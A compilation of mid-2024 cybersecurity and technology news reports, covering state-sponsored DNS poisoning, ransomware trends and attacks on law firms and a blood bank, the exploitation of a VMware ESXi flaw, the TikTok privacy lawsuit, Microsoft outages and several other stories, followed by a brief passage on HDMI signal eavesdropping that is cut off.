Analysts at Volexity said the hacking operation — known as Evasive Panda, Bronze Highland, Daggerfly and StormBamboo — was indeed undertaking “adversary in the middle” attacks in 2023 as it infected Mac and Windows systems. In such incidents, threat actors get between a device and an otherwise trusted server to deliver malicious code.

Researchers at a different company, ESET, had attributed at least one malware infection to Evasive Panda in 2023 but could only speculate that it was an adversary-in-the-middle attack.

Volexity said its analysis showed that Evasive Panda had compromised the target’s ISP and was poisoning DNS requests — the basic communications that help devices reach internet addresses.

“Volexity notified and worked with the ISP, who investigated various key devices providing traffic-routing services on their network,” Volexity said. “As the ISP rebooted and took various components of the network offline, the DNS poisoning immediately stopped.”

The attackers had used the disruption to serve up information-stealing malware known as MgBot or Pocostick (for Windows machines) and Macma (for MacOS devices). MgBot, in particular, has been a tool for Evasive Panda for more than a decade. ESET found MgBot used against China’s Tibetan population earlier this year.

Volexity said that in the 2023 incidents it analyzed, certain apps would request updates but the users’ devices would get MgBot and Macma instead.

“StormBamboo appeared to target software that used insecure update mechanisms, such as HTTP, and did not properly validate digital signatures of installers,” Volexity said.

Evasive Panda remains “a highly skilled and aggressive threat actor,” the researchers said, with a wide variety of malware at hand and “significant effort” invested in operations.

Source

The government said TikTok violated the Children's Online Privacy Protection Act that requires services aimed at children to obtain parental consent to collect personal information from users under age 13.

The Chinese-owned short-video platform boasts around 170 million U.S. users, and is currently fighting a new law that would force ByteDance to divest TikTok's U.S. assets by Jan. 19 or face a ban.

The lawsuit is the latest U.S. action against TikTok and its Chinese parent over fears the company improperly collects vast amounts of data on Americans for the Chinese government, while influencing content in a way that could harm Americans.

The suit, which was joined by the Federal Trade Commission, said it was aimed at putting an end "to TikTok's unlawful massive-scale invasions of children's privacy."

Representative Frank Pallone, the top Democrat on the Energy and Commerce Committee, said the suit "underscores the importance of divesting TikTok from Chinese Communist Party control. We simply cannot continue to allow our adversaries to harvest vast troves of Americans’ sensitive data."

TikTok said Friday it disagrees "with these allegations, many of which relate to past events and practices that are factually inaccurate or have been addressed. We are proud of our efforts to protect children, and we will continue to update and improve the platform."

The DOJ said TikTok knowingly permitted children to create regular TikTok accounts, and then create and share short-form videos and messages with adults and others on the regular TikTok platform. TikTok collected personal information from these children without obtaining consent from their parents.

The U.S. alleges that for years millions of American children under 13 have been using TikTok and the site "has been collecting and retaining children's personal information."

"TikTok knowingly and repeatedly violated kids’ privacy, threatening the safety of millions of children across the country,” said FTC Chair Lina Khan, whose agency in June referred the case to the Justice Department.

The FTC is seeking penalties of up to $51,744 per violation per day from TikTok for improperly collecting data, which could theoretically total billions of dollars if TikTok were found liable.

Reuters in 2020 first reported the FTC and Justice Department were looking into allegations the popular social media app failed to live up to a 2019 agreement aimed at protecting children's privacy.

The company last year faced fines from the European Union and U.K. over its handling of children's data.

On Tuesday, U.S. Senate passed a bill that would extend COPPA to cover teenagers up to age 17, ban targeted advertising to kids and teens, and give parents and kids the option to delete their information from social media platforms.

The bill would need to pass in the Republican-controlled House, currently on recess until September, to become law.

Source

In January, Twilio announced that the Authy desktop apps for Windows, macOS, and Linux would reach the end of life on March 19, 2024, and will ultimately be discontinued in August 2024.

While the desktop apps continued to work past March, when opened, they showed an alert warning that the program had reached end of life and that users should switch to the mobile versions immediately.

This ended about thirteen days ago when Twilio forcibly logged all desktop devices out of their Authy accounts and no longer allowed them to log back in with their phone numbers.

Those who have continued to use Authy for Desktop, even after all the warnings, have found that their 2FA accounts are gone unless they had previously synced them with a mobile device.

However, those who synced their desktop apps with the mobile versions have discovered that some of their tokens did not correctly synchronize, making their associate accounts inaccessible.

In June, threat actors found an unsecured Authy API that could be used to verify if a phone number was associated with a valid account.

The threat actors fed millions of phone numbers into the API, allowing them to build profiles of 33 million phone numbers on Authy, which were then leaked on a hacking forum.

Twilio fixed the bug by securing the API and releasing an updated mobile app version. Some believe that Authy desktop users cannot log in because the desktop app has not been updated with the new fix for the API.

However, in June, Authy released version 3.0, stating it would be the final desktop release, so we will unlikely see another one.

Update 8/1/24: Twilio told BleepingComputer that users were logged out as part of the planned end-of-life plans for Authy desktop apps as described here.

Source

Hope you enjoyed this news post.

Thank you for appreciating my time and effort posting news every single day for many years.

2023: Over 5,800 news posts | 2024 (till end of July): 3,313 news posts

2023 was the worst year on record for cybersecurity in the legal industry by some distance.

Just one point of evidence: Since 2018, 2.9 million records have been stolen in association with publicly reported breaches of law firms.

Some 1.56 million records were stolen last year alone, an increase of 615% as compared with the down year of 2022 (218,473 records).

A new blog post from Comparitech paints a picture of an industry struggling to grapple with the ransomware problem. Major law firms have been paying multimillion dollar sums to protect their clients' ultra-sensitive data, and flailing in their attempts to fight back.

The State of Legal Industry Cybersecurity

Since 2018, 138 legal firms have publicly admitted being affected by ransomware attacks.

Of those, 107 attacks have been US-based, with approximately 2.9 million records affected. As Comparitech noted, the distance between the US and its next neighbors — the UK, with 9 attacks affecting 9,703 records, and Germany, with 5 affecting an unknown number — may have more to do with reporting requirements than anything else.

The average ransom among publicly reported cases has been $2.47 million, and the average amount actually paid out after negotiations is $1.65 million. These numbers are rough estimates of reality, however, as only 11 reported incidents also reported the ransom demands, with only eight reported ransoms paid.

Consequences to Law Firms

If ransomware attacks against law firms have been trending, it's because they make for perfect targets.

"Legal firms are an interesting case," Paul Bischoff, privacy advocate at Comparitech explains, "because with most any other company, hackers are just looking for low-hanging fruit. They may want as many, say, Social Security numbers or passwords as they can possibly steal. And higher quantities of records is the goal. But with law firms, you have data that's very valuable to very specific people.

Documents related to ongoing litigation would be extremely valuable to an opposing party in that case. So it's not so much about the quantity of data as much as it is about the content."

The ultra-sensitivity of legal data puts firms in a difficult negotiating position: pay millions of dollars, and risk achieving nothing, or don't, and risk extra ire from clients. 12% of legal industry ransomware attacks have resulted in lawsuits, and at least 75% of those have been successful.

Another reason to pay up? Comparitech estimates that the 138 attacks recorded might have cost victims around $18.8 billion dollars, purely thanks to the downtime they incurred. One victim of LockBit — the Ince Group, based in London — filed for bankruptcy last year after failing to cover the £5 million ($6.5 million USD) it spent restoring its systems.

Meanwhile, when victims try to use the law in their aid, they usually fail. The UK's Ward Hadaway and Australia's HWL Ebsworth Lawyers both issued injunctions against their attackers to little effect, as anonymous hackers aren't particularly easy to wrangle into court.

Canadian firm Robson Carpenter LLP enjoyed seeing its attacker face justice, but in the end received just $2,500 in restitution.

On the bright side, ransomware attacks against law firms in 2024 are noticeably lagging behind last year's numbers. Only 11 have been reported so far, affecting an unknown volume of client data.

"Overall, ransomware attacks happen down in frequency of attacks across all sectors that we've been covering," Bischoff notes. Perhaps, he speculates, attackers have been choosing quality over quantity. Or, more optimistically, "I think it's law enforcement crackdowns, and companies and organizations getting better in general at knowing what these threats are and being prepared."

Source

The powerful attack vector, which exploits weaknesses in the domain name system (DNS), is being exploited by over a dozen Russian-nexus cybercriminal actors to stealthily hijack domains, a joint analysis published by Infoblox and Eclypsium has revealed.

"In a Sitting Ducks attack, the actor hijacks a currently registered domain at an authoritative DNS service or web hosting provider without accessing the true owner's account at either the DNS provider or registrar," the researchers said.

"Sitting Ducks is easier to perform, more likely to succeed, and harder to detect than other well-publicized domain hijacking attack vectors, such as dangling CNAMEs."

Once a domain has been taken over by the threat actor, it could be used for all kinds of nefarious activities, including serving malware and conducting spams, while abusing the trust associated with the legitimate owner.

Details of the "pernicious" attack technique were first documented by The Hacker Blog in 2016, although it remains largely unknown and unresolved to date. More than 35,000 domains are estimated to have been hijacked since 2018.

"It is a mystery to us," Dr. Renee Burton, vice president of threat intelligence at Infoblox, told The Hacker News. "We frequently receive questions from prospective clients, for example, about dangling CNAME attacks which are also a hijack of forgotten records, but we have never received a question about a Sitting Ducks hijack."

At issue is the incorrect configuration at the domain registrar and the authoritative DNS provider, coupled with the fact that the nameserver is unable to respond authoritatively for a domain it's listed to serve (i.e., lame delegation).

It also requires that the authoritative DNS provider is exploitable, permitting the attacker to claim ownership of the domain at the delegated authoritative DNS provider while not having access to the valid owner's account at the domain registrar.

In such a scenario, should the authoritative DNS service for the domain expire, the threat actor could create an account with the provider and claim ownership of the domain, ultimately impersonating the brand behind the domain to distribute malware.

"There are many variations [of Sitting Ducks], including when a domain has been registered, delegated, but not configured at the provider," Burton said.

The Sitting Ducks attack has been weaponized by different threat actors, with the stolen domains used to fuel multiple traffic distribution systems (TDSes) such as 404 TDS (aka Vacant Viper) and VexTrio Viper. It has also been leveraged to propagate bomb threat hoaxes and sextortion scams.

"Organizations should check the domains they own to see if any are lame and they should use DNS providers that have protection against Sitting Ducks," Burton said.

Source

The downfall of previously high-flying ransomware operations Alphv and LockBit has shaken up the criminal underground, turning some former affiliates into lone operators and causing some under-the-radar groups to rack up record extortion payments.

Ransomware incident response firm Coveware said in a report that 10% of all ransomware attacks it monitored from April through June came from lone operators - a massive surge.

Those hackers likely are former affiliates of Alphv - aka BlackCat - or LockBit, "or actors that made the decision to operate independently due to the increasing threat of exposure, interruption and profit loss associated with 'toxic' ransomware brands," Coveware said.

Not every former affiliate of a disrupted ransomware gang is choosing to go it alone. One victim earlier this year paid the highest publicly known ransom in history, worth $75 million, to the Dark Angels ransomware group, said Zscaler ThreatLabz. Dark Angels has operated since May 2022 and runs the Dunghill data leak site, but it "has managed to attract very minimal attention."

Blockchain analytics firm Chainalysis said it saw the record-setting payment. Big game hunting, or "fewer attacks on larger targets with deeper pockets," lately continues to grow "more pronounced," it said in a post to social platform X.

Who paid the recent $75 million ransom? Zscaler declined to name names, saying only that the firm is on the Fortune 50 list of the most profitable publicly traded U.S. companies. As Bleeping Computer reported, this could line up with a ransomware attack against Fortune 10 pharmaceutical giant Cencora in February, which disclosed the attack but offered no specifics.

No ransomware group ever claimed credit for the hit. When this happens, it often means a victim did pay a ransom, which forestalled the attackers from trying to name and shame them or leak stolen data.

Rampant Innovation

Never-ending innovation by top-flight ransomware attackers highlights their profit-making imperative at the expense of all else, as repeat hits on hospitals, blood banks, schools and critical infrastructure demonstrate.

Much innovation arrived in recent years alongside the rise of ransomware-as-a-service groups. These paired operators who built crypto-locking malware, ran data leak infrastructure and sometimes handled negotiations with affiliates who used the malware to take down targets, typically keeping 70% or 80% of every resulting ransom in return.

Even with these RaaS groups, experts said credit for most attacks also goes to the affiliates involved. After BlackCat disappeared in March, one of its Western affiliates accused the Russian operators of purposefully shutting down, rather than sharing his cut of a $22 million ransom paid by UnitedHealth Group after he hit its Change Healthcare unit.

Even without such dramatic backstabbing, affiliates regularly switch allegiance, sometimes in return for a bigger commission or to access technical innovations. Some also work with multiple groups at once, deciding on a per-victim basis which type of ransomware might be the best fit, perhaps based on the crypto-locking malware's capabilities, if it is a supply chain attack, or on the basis of a group's data leak infrastructure, negotiation capabilities or even the scariness of its reputation (see: Ransomware Groups' Data Leak Blogs Lie: Stop Trusting Them).

Just as affiliates come and go, the groups themselves may have opaque relationships with each other. When Dark Angels debuted, it used a variant of Babuk ransomware, reported Cyble. The group then switched to Ragnar Locker, at least until police seized that group's infrastructure last October, ThreatLabz said.

Imperative: Make Victims Pay

The impetus for ransomware threat actors' unceasing innovation is to counteract the constant improvement in organizations' collective defenses and force more victims to pay.

Lately, the bad guys appear to have gained an edge. Coveware said 36% of victims chose to pay a ransom during the second quarter of this year, up from 28% in the first three months. They paid on average $391,015 - a 2.4% increase from the prior quarter. In the same time frame, the median ransom payment dropped by one-third, to $170,000. This could reflect a relatively higher number of lower-price ransom payments than before and/or a few very high payments.

Of the companies who paid, 43% did so solely in response to data exfiltration, in return for a promise from criminals to delete their stolen data. This was a sharp increase from the 23% who paid only for data deletion from January through March (see: Ransom Realpolitik: Paying for Data Deletion Is for Suckers).

Coveware said the greatest number of attacks it saw involved Akira ransomware, followed by independent operators. Next up in terms of market share were Black Basta, BlackSuit, LockBit 3.0, Medusa, BianLian, Inc Ransom and Phobos.

Both Akira and Black Basta's market shares held steady in the first half of this year, and the tactics, techniques and procedures used to distribute their ransomware didn't appear to change, "suggesting not all ransomware brands have opened their doors to receive displaced affiliates," Coveware said. At the same time, TTPs previously tied to just BlackCat or LockBit attacks suddenly became tied to other groups' or independent operators' attacks.

As that highlights, simply tracking which ransomware groups appear to be hot or not doesn't tell the full story - and especially now with more lone wolves in play.

Source

The charges have no rhyme or reason to them and are seen on physical and virtual credit cards of all types, including those from Discover, Monzo, Capital One, and other Visa cards. Some people report that charges were also attempted against older deactivated cards.

According to reports, the charges started approximately ten days ago, on July 21st, with the number of impacted people increasing as time passed.

"Not sure if it was just me today but seems like I've got a shopify active card check today. Thankfully, no money was debited. Got in touch with support and they confirmed it was a scammer," warned a Monzo card member on Reddit.

"I just received an email from privacy.com notifying me of a decline. The declined payment was for $0.00 charge at SHOPIFY-CHARGE.COM I have not used this card outside of paying for my Wyze cam subscription," warned another person.

Since then, many people have reported these unusual charges on Reddit and the Shopify forums.

Of more concern is that two people claimed to have received similar charges soon after creating a new virtual card at their bank.

The attempted charges state they are from shopify-charge.com with a phone number of 866-938-2427. Some attempted charges include an address of 5715 Will Clayton Pkwy, Texas 77338, which appears to be a non-existent location.

However, Shopify-charge.com is a legitimate website operated by Shopify that, when visited in a browser, explains to a user that the charge came from a subscription fee or a purchase at a Shopify store. While some who received these charges claim they have never used their credit card at Shopify, many stores use the platform as their backend without a customer knowing.

As for the phone number, BleepingComputer's attempts to call it led to the debt collection firm Halsted Financial. BleepingComputer emailed the company to see if they were associated with the charges but has not received a reply yet.

One impacted person posted to Reddit saying they called the number, and Halsted said they do not know why their number is associated with these charges.

Shopify has recently suffered a third-party data breach at one of its vendors, leading many to think these charges may be related. However, the data exposed in that breach did not contain credit card or payment information.

BleepingComputer attempted to contact Shopify multiple times but did not receive a reply to our emails.

If you have received any of these charges and have more information to share, please comment on this story, contact us via Signal at 646-961-3731, or email us tips@bleepingcomputer.com.

Source

Hope you enjoyed this news post.

Thank you for appreciating my time and effort posting news every single day for many years.

2023: Over 5,800 news posts | 2024 (till end of July): 3,313 news posts

Nonprofit OneBlood, which provides blood to healthcare facilities across the southeast, released a statement on Wednesday warning the public that the ransomware attack is impacting their ability to operate.

“We have implemented manual processes and procedures to remain operational. Manual processes take significantly longer to perform and impacts inventory availability,” said Susan Forbes, OneBlood senior vice president of corporate communications.

“In an effort to further manage the blood supply we have asked the more than 250 hospitals we serve to activate their critical blood shortage protocols and to remain in that status for the time being.”

OneBlood said it is now working with cybersecurity specialists alongside federal and state officials to resolve the crisis. The organization provides blood and other healthcare material to hundreds of hospitals across Alabama, South Carolina, Florida, Georgia and North Carolina.

The organization is still operational and has continued to collect, test and distribute blood but is “operating at a significantly reduced capacity.”

The incident has prompted an outpouring of support from other blood organizations and the AABB Disaster Task Force is now organizing efforts to send blood and platelets to OneBlood. There is an urgent need for O positive, O negative and platelet donations, but all blood types are needed.

Forbes said the company immediately began an investigation to confirm the attack before kicking off efforts to address the incident.

“Our comprehensive response efforts are ongoing and we are working diligently to restore full functionality to our systems as expeditiously as possible,” Forbes explained.

“The blood supply cannot be taken for granted. The situation we are dealing with is ongoing. If you are eligible to donate, we urge you to please make an appointment to donate as soon as possible.”

The attack was first reported by CNN, which obtained an advisory sent to the Health Information Sharing and Analysis Center that warned of potential shortages at hospitals in Florida. The organization has had to manually label blood products due to the ransomware attack, CNN reported.

The attack comes just one week after a prominent U.K. blood test provider said it has made significant progress in rebuilding substantial parts of its IT infrastructure following a ransomware attack in June.

Pathology services provider Synnovis was attacked by the Qilin ransomware gang last month, causing the cancellation of more than 1,000 critical surgeries and forcing England’s National Health Service to issue urgent calls for O-type blood donations.

The ransomware attack left U.K. national blood stocks “in a very fragile position,” according to a letter sent two weeks ago to National Health Service chief executives.

Ransomware gangs also attacked the national lab service of South Africa, gravely impacting the country’s efforts to deal with several concurrent health crises — mpox, HIV and tuberculosis.

Source

Thyroid cancer is the ninth most common cancer among Taiwanese people, according to Wang Chih-yuan (王治元), deputy director at the Department of Internal Medicine at National Taiwan University Hospital and leader of the research team that conducted the groundbreaking study.

"Thyroid cancer has the longest survival rate among thyroid-related cancers, making long-term monitoring an important issue," Wang said at a press conference on Wednesday.

A total thyroidectomy (surgical removal of all the thyroid gland) and radioactive iodine therapy are the two most common treatments for thyroid cancer, explained Wang, adding that the detection of serum thyroglobulin, a protein found in human blood, is the traditional way to monitor patients for residual tumor cells or recurrent cancer.

However, such a detection method is invasive since it requires drawing blood from patients, and can also be affected by anti-thyroglobulin antibodies, Wang noted.

He added that the process also requires the stimulation of recombinant human thyroid-stimulating hormone (rhTSH) to enhance sensitivity, which costs around NT$40,000 (US$1,219) each time.

"Therefore, finding a simple, effective, and non-invasive tracking method (for the patients' conditions) is what we are currently striving to achieve," Wang said.

Dating back to the first batch of 21 patients that joined the study in 2016, the research team found that proteins and peptides in patients' urine, specifically urinary exosomal thyroglobulin (U-Ex Tg) and its associated urinary exosomal peptides panel, can serve as biomarkers that can indicate the recurrence of thyroid cancer.

During the research process, the team collected and analyzed urine samples from patients who had been recently diagnosed with papillary or follicular thyroid cancer before and immediately after a total thyroidectomy, as well as three and six months after surgery.

"The analysis results show a positive correlation between U-Ex Tg levels and tumor size, and provided pathological insights that the traditional method (of serum thyroglobulin detection) cannot achieve," Wang said, noting the new method also has higher sensitivity and accuracy than the traditional one.

To validate the trend changes in the levels of U-Ex Tg, the research team also analyzed galectin-3/TIMP/Angiopoietin-1, another thyroid cancer-related protein in urine.

Wang said that this research approach is why the detection method has obtained patents in Taiwan, Japan, and the United States, as it involves not just a single protein, "but is validated through additional methods."

Following the International Journal of Nanomedicine publishing his research in May this year, Wang said that his team plans to conduct large-scale clinical trials to further understand the effectiveness of detecting the biomarker U-Ex Tg in patients with different types and stages of thyroid cancer.

"We believe that with the accumulation of more clinical data, U-Ex Tg and its associated urinary exosomal peptides panel will become the standard monitoring method for postoperative thyroid cancer in the future," he added.

According to the most recent published data from Health Promotion Administration, the incidence rate of thyroid cancer in Taiwan in 2021 was 4,626 cases per 100,000 people.

Source

In the past, the Google Chrome team has introduced several measures to prevent cookie theft done by infostealer malware, including Chrome’s download protection using Safe Browsing, Device Bound Session Credentials, and Google’s account-based threat detection. Now, the team has announced an additional layer of protection to make Chrome on Windows users safer from cookie-stealing malware.

Google Chrome uses Keychain services on macOS, kwallet or gnome-libsecret on Linux and Data Protection API (DPAPI) on Windows to store sensitive data such as cookies and passwords. While DPAPI on Windows protects this sensitive data at rest from other users on the system or cold boot attacks, it does not protect against malicious apps capable of executing code as the logged-in user. This loophole can be exploited by infostealer malware to steal data.

Starting with Chrome 127, Google is adding another layer of protection by providing Application-Bound (App-Bound) Encryption primitives. Instead of allowing any app running as the logged-in user to access the sensitive data, Chrome will now encrypt data tied to app identity. Initially, only cookies will be migrated to this improved storage method, with plans to expand it to passwords, payment data, and other persistent authentication tokens in the future.

Will Harris, Chrome Security Team, emphasized that App-Bound Encryption increases the difficulty for cybercriminals:

App-Bound Encryption increases the cost of data theft to attackers and also makes their actions far noisier on the system. It helps defenders draw a clear line in the sand for what is acceptable behavior for other apps on the system.

This security improvement marks a significant step towards a more secure browsing experience for millions of Chrome users worldwide.

Source: Google

Source

Hope you enjoyed this news post.

Thank you for appreciating my time and effort posting news every single day for many years.

2023: Over 5,800 news posts | 2024 (till end of July): 3,313 news posts

The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.

"This form of attack is an advanced form of social engineering, designed to manipulate individuals into divulging confidential information or performing actions that they might normally not," Securonix researchers Den Iuzvyk and Tim Peck said in a new report shared with The Hacker News.

DEV#POPPER is the moniker assigned to an active malware campaign that tricks software developers into downloading booby-trapped software hosted on GitHub under the guise of a job interview. It shares overlaps with a campaign tracked by Palo Alto Networks Unit 42 under the name Contagious Interview.

Signs that the campaign was broader and cross-platform in scope emerged earlier this month when researchers uncovered artifacts targeting both Windows and macOS that delivered an updated version of a malware called BeaverTail.

The attack chain document by Securonix is more or less consistent in that the threat actors pose as interviewers for a developer position and urge the candidates to download a ZIP archive file for a coding assignment.

Present with the archive is an npm module that, once installed, triggers the execution of an obfuscated JavaScript (i.e., BeaverTail) that determines the operating system on which it's running and establishes contact with a remote server to exfiltrate data of interest.

It's also capable of downloading next-stage payloads, including a Python backdoor referred to as InvisibleFerret, which is designed to gather detailed system metadata, access cookies stored in web browsers, execute commands, upload/download files, as well as log keystrokes and clipboard content.

New features added to the recent samples include the use of enhanced obfuscation, AnyDesk remote monitoring and management (RMM) software for persistence, and improvements to the FTP mechanism employed for data exfiltration.

Furthermore, the Python script acts as a conduit to run an ancillary script that's responsible for stealing sensitive information from various web browsers – Google Chrome, Opera, and Brave – across different operating systems.

"This sophisticated extension to the original DEV#POPPER campaign continues to leverage Python scripts to execute a multi-stage attack focused on exfiltrating sensitive information from victims, though now with much more robust capabilities," the researchers said.

Source

Zimperium researchers discovered the operation and have been tracking it since February 2022. They report finding at least 107,000 distinct malware samples associated with the campaign.

The cybercriminals are motivated by financial gain, most likely using infected devices as authentication and anonymization relays.

Telegram entrapment

The SMS stealer is distributed either through malvertising or Telegram bots that automate communications with the victim.

In the first case, victims are led to pages mimicking Google Play, reporting inflated download counts to add legitimacy and create a false sense of trust.

On Telegram, the bots promise to give the user a pirated application for the Android platform, asking for their phone number before they share the APK file.

The Telegram bot uses that number to generate a new APK, making personalized tracking or future attacks possible.

Zimperium says the operation uses 2,600 Telegram bots to promote various Android APKs, which are controlled by 13 command and control (C2) servers.

Most of the victims of this campaign are located in India and Russia, while Brazil, Mexico, and the United States also have significant victim counts.

Generating money

Zimperium found that the malware transmits the captured SMS messages to a specific API endpoint at the website 'fastsms.su.'

The site allows visitors to purchase access to "virtual" phone numbers in foreign countries, which they can use for anonymization and to authenticate to online platforms and services.

It is very likely that the infected devices are actively used by that service without the victims knowing it.

The requested Android SMS access permissions allow the malware to capture the OTPs required for account registrations and two-factor authentication.

BleepingComputer has contacted the Fast SMS service to ask about Zimperium's findings, but a response wasn't available by publication.

For the victims, this can incur unauthorized charges on their mobile account, while they may also be implicated in illegal activities traced back to their device and number.

To avoid phone number abuse, avoid downloading APK files from outside Google Play, do not grant risky permissions to apps with unrelated functionality, and ensure Play Protect is active on your device.

Source

Hope you enjoyed this news post.

Thank you for appreciating my time and effort posting news every single day for many years.

2023: Over 5,800 news posts | 2024 (till end of June): 2,839 news posts

Inspired by Micode’s video on the best catchphrases on dating apps, YouTuber Defend Intelligence made multiple chatbots to see if AI can fool humans. Spoiler alert: we are not ready for sexy Skynet. We may think we are too good to fall for such a scheme, and I bet that’s exactly what many of those who got caught in the net said.

Defend Intelligence made five bots with different personalities, four pretending to be females plus one posing as a male. Interestingly, while the YouTuber coded the bot to not give users hope by accepting real-life meetings, the AI sometimes crossed the line and accepted.

Thankfully the second rule ordering the AI to stop talking with each user after 40 messages did work as intended, preventing the build of romantic links. Something that some users didn’t accept, continuing to text the bot long after the latter ghosted them. For example, one person sent over a hundred messages after the AI stopped talking, showing just how easy it is to get hooked.

But this isn’t the worst part, some started sharing personal feelings and desires thinking they were talking to a human. Things that can be used against them if the one behind the bot has bad ideas. This shows how AI can be used to get someone to become emotionally dependent, which opens the door to predatory behaviours such as scams. So, after seeing this you may want to be more careful.

As you can guess these apps are extremely sensitive and aggressive whenever they suspect an account of being a bot. Thus, to avoid their radar as much as possible Defend Intelligence used real smartphones controlled via ADB (Android Debug Bridge) instead of emulators, plus as close to reality pictures – one of which is based on a friend of his.

Some users went as far as to image search the latter, managing to find her true Instagram account and messaging her there. This prompted the YouTuber to take things a step further by creating websites for his bots to make them look more like true individuals who have lives.

After some time had passed on this experiment, a funny yet eye-opening thing happened. Two of the AI bots matched together and started talking, each acting as if it was human.

While it may be funny to see two AIs hitting on each other, it gives us a glimpse at a potential future. One where everyone has an AI reflecting their personality, used to filter the massive number of potential partners before giving a curated list of high-potential matches. These could be people sharing the same interests or having traits you appreciate. For example, someone who likes jokes, or someone that doesn’t need to be texted every hour.

To drive home the likelihood of this occuring, the number of online dating service users worldwide surpassed 381 million in 2023, according to Statista. This is a possibility that Whitney Wolfe Herd – Founder of dating app Bumble – talked about. After all, AI and algorithms already choose our future to some extent as they are responsible for which person’s profile we will see next. Fantastic or dystopian, I’ll let you be the judge.

Source

We're currently investigating access issues and degraded performance with multiple Microsoft 365 services and features. More information can be found under MO842351 in the admin center.

— Microsoft 365 Status (@MSFT365Status) July 30, 2024

Impacted services include, but are not limited to:

•     Microsoft Entra
•     Microsoft Power Platform
•     Microsoft Intune
•     Microsoft 365 Admin Center

The following services are not impacted:

•     SharePoint Online
•     OneDrive for Business
•     Microsoft Teams
•     Exchange Online

To mitigate the network issue, Microsoft has implemented networking configuration changes and performed failovers to alternate networking paths. According to Microsoft's telemetry, these networking changes have shown improvement in service availability since approximately 14:10 UTC. Microsoft is continuing to monitor the situation to ensure the full recovery of all Microsoft 365 services.

Given that Microsoft 365 services experienced a similar outage earlier this month, it's clear that Microsoft needs to prioritize enhancing the reliability of its cloud infrastructure. Repeated disruptions to essential services not only inconvenience users but also raise concerns about the platform's stability. As we await further updates from Microsoft, we hope they will take significant steps to prevent such issues from recurring in the future.

Source

Microsoft warned that multiple ransomware gangs including Black Basta are exploiting a VMware ESXi vulnerability that could allow attackers to gain full administrative permissions on an affected machine.

In a blog post published Monday, Microsoft detailed the VMware ESXi medium severity authentication bypass vulnerability tracked as CVE-2024-37085, and confirmed it's under active exploitation by ransomware gangs. Microsoft credited its researchers Danielle Kuznets Nohi, Edan Zwick, Meitar Pinto, Charles-Edouard Bettan and Vaibhav Deshmukh for discovering the vulnerability.

Exploitation could allow attackers with Windows Active Directory permissions to gain full access to an ESXi hypervisor host. Microsoft warned that attacks could affect critical network servers.

Microsoft researchers observed several ransomware operators -- including ones it tracks as Storm-0506, Storm-1175 and Octo Tempes -- leveraging the flaw to deploy Black Basta and Akira ransomware.

"Over the last year, we have seen ransomware actors targeting ESXi hypervisors to facilitate mass encryption impact in few clicks, demonstrating that ransomware operators are constantly innovating their attack techniques to increase impact on the organizations they target," Microsoft wrote in the blog.

Researchers discovered the flaw while investigating "numerous attacks" conducted by ransomware operators Microsoft tracks as Storm-0506, Storm-1175, Octo Tempest and Manatee Tempest that involved ESXi hypervisor. Attack analysis revealed the threat actors leveraged an ESXi vulnerability to elevate their privileges to full administrative access on the ESXi hypervisor.

"Further analysis of the vulnerability revealed that VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. This group is not a built-in group in Active Directory and does not exist by default," the blog said.

The researchers then discovered three ways attackers could exploit CVE-2024-37085. Microsoft warned that the first method, which involves adding the "ESX admins" group and a user to the domain, is currently the only one being actively exploited by the ransomware groups.

Researchers reported the flaws to VMware earlier this year, according to the blog.

"ESXi is a popular product in many corporate networks, and in recent years, we have observed ESXi hypervisors become a favored target for threat actors," the blog said.

Microsoft added that ESXi is a popular target for attackers because hypervisors have limited security product options and pose visibility challenges for Security Operations Center teams.

Microsoft stressed that its incident response engagements involving ESXi hypervisors more than doubled over the last three years. It's particularly dangerous when ransomware is involved.

Last year, Mandiant warned that a Chinese advanced persistent threat group it tracks as UNC3886 was exploiting a ESXi zero-day vulnerabiity. Just prior to that, attackers exploited a two-year-old ESXi vulnerability in a widespread ransomware campaign dubbed "ESXiArgs." The attacks highlighted enterprises' hypervisor patching struggles, which could pose a problem with CVE-2024-37085.

Microsoft said it observed Storm-0506 deploy Black Basta ransomware then exploit CVE-2024-37085 against an unnamed engineering firm earlier this year. The full attack scope and patching rates remain unknown.

"Microsoft observed that the threat actor created the 'ESX Admins' group in the domain and added a new user account to it, following these actions, Microsoft observed that this attack resulted in encrypting of the ESXi file system and losing functionality of the hosted virtual machines on the ESXi hypervisor," the blog said.

In addition to applying VMware's fix for CVE-2024-37085, Microsoft recommended that enterprises implement MFA, isolate privileged accounts from productivity accounts and improve critical assets posture.

TechTarget Editorial contacted Broadcom regarding the attack scope and patching rates. Broadcom provided the following statement:

"On July 29, 2024, Microsoft reported on the use of a known vulnerability in VMware ESXi by ransomware actors who had obtained access to a victim's network through unrelated means. This medium-severity ESXi vulnerability, cataloged as CVE-2024-37085, was discovered by Microsoft earlier this year and responsibly reported to Broadcom. We promptly fixed the issue in a software update to ESXi 8.x and published a security advisory that explained how to change settings in earlier versions of ESXi to mitigate the threat. Customers who have not yet updated ESXi or followed the published guidance are vulnerable to this authentication-bypass risk once a malicious actor has obtained unauthorized Active Directory privileges. For more information on Broadcom's recommendations for VMware product hardening, please visit the VMware Cloud Foundation Security Enablement website."

Microsoft provided the following statement to TechTarget Editorial: "Ransomware poses a major, high-severity threat being leveraged by threat actors across the landscape. Organizations should be aware that exploiting this vulnerability could lead to ransomware attacks or other malicious activities.

"Microsoft frequently collaborates with other software vendors and partners to ensure coordinated responsible disclosure. VMWare is one of those partners, and this vulnerability was responsibly disclosed, coordinated and finally released and assigned a CVE ID in June 2024." 

Source

Microsoft is experiencing a significant global outage of its cloud and Office services.

“We are investigating reports of issues connecting to Microsoft services globally,” the company said.

The issue is not impacting all users, but just a large subset.

Along with Azure services and the Azure Portal, Microsoft 365 services and features, including Outlook, Word, and Excel, are affected.

"We have implemented networking configuration changes and have performed failovers to alternate networking paths to provide relief," Microsoft said in an update.

"Monitoring telemetry shows improvement in service availability, and we are continuing to monitor to ensure full recovery."

The outage comes less than two weeks after an Azure outage and a separate CrowdStrike-caused outage of millions of Windows systems.

The latter issue caused flights to be canceled, hospital appointments to be pushed back, and retailers to shut.

Source

Covertly intercepting video signals is a very old-fashioned way to go about electronic spying, but a new method discovered by researchers puts a frightening spin on it.

A research team out of Uruguay has found that it’s possible to intercept the wireless electromagnetic radiation coming from an HDMI cable and interpret the video by processing it with AI. Three scientists from the University of the Republic in Montevideo published their findings on Cornell’s ArXiv service, spotted by Techspot.

